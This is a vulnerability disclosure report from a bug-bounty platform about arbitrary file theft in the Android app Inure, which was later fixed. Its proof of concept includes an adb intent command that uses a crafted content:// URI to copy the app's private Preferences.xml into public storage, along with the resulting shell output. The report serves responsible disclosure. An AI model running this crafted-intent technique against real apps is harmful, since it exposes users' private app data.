Theft of Arbitrary Files due to lack of intent validation and insecure usage of provider paths in TTFViewerActivity.kt in hamza417/inure


Reported on

Aug 24th 2023


Through the use of Oversecured, leading vulnerability scanner for Android and iOS applications, we were able to detect an Theft of Arbitrary Files vulnerability within TTFViewerActivity.kt. Check full issue definition in the image below:

Root Cause Analysis

The TTFViewerActivity failed to adequately validate the incoming prior to forwarding it to the openInputStream function, creating a potential vulnerability for accessing arbitrary files. For instance, an opportunity existed to utilize content:// data using the Inure application's file provider scheme, thereby enabling the extraction of files from its internal directory.

Extraction of the opened files was facilitated by their storage in a directory that was publicly accessible. This was due to the fact that the activity utilized context.getExternalFilesDir to save the files in that location.

This attack was chained with an insecure usage within the provider paths, which further contributed to the exploit:

Proof of Concept

Access your device shell using adb shell then navigate to /storage/emulated/0/Android/data/app.simple.inure/files/font_cache in order to examine the contents of the directory. For now it's empty:

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la  
total 6  
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:18 .  
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..

Send the following intent:

adb shell am start -n app.simple.inure/.activities.association.TTFViewerActivity -d "content://app.simple.inure.provider/root/data/data/app.simple.inure/shared_prefs/Preferences.xml" -a "android.intent.action.VIEW" -t "font/ttf"

Review the font_cache directory again and notice that the Preference.xml was saved:

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la  
total 10  
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:22 .  
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..  
-rw-rw---- 1 u0_a508 sdcard_rw 771 2023-08-25 07:22 Preferences.xml  

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ cat Preferences.xml 
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>  
<boolean name="apk_external_storage" value="false" />  
<boolean name="is_external_storage" value="false" />  
<int name="app_accent_color" value="-29592" />  
<boolean name="dont_show_again" value="true" />  
<int name="main_app_launch_count" value="13" />  
<boolean name="is_custom_color" value="false" />  
<int name="view_positions" value="7" />  
<int name="notes_list_type" value="0" />  
<boolean name="disclaimer_agreed" value="true" />  
<string name="last_search_keyword"></string>  
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>  
<long name="crash_timestamp" value="-1" />  
<boolean name="deep_search_keyword_mode" value="false" />  

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $


An application's internal directory and the files within it should never be accessible by other applications within a device. The vulnerability reported demonstrates that it is possible for malicious third-party applications to steal data belonging to the Inure app's private directory and access it through a publicly available external storage directory through sending a crafted intent to TTFViewerActivity.

We are processing your report and will contact the hamza417/inure team within 24 hours. a month ago
Carlo Jae Avila modified the report
a month ago
We have contacted a member of the hamza417/inure team and are waiting to hear back a month ago
Hamza Rizwan validated this vulnerability 23 days ago
Carlo Jae Avila has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Hamza Rizwan marked this as fixed in build92 with commit 7db551 23 days ago
Hamza Rizwan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Sep 10th 2023
Hamza Rizwan gave praise 23 days ago
Thanks for the heads-up. I added a wrong commit hash accidentally, I hope this won't be an issue.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Hamza Rizwan published this vulnerability 12 days ago
to join this conversation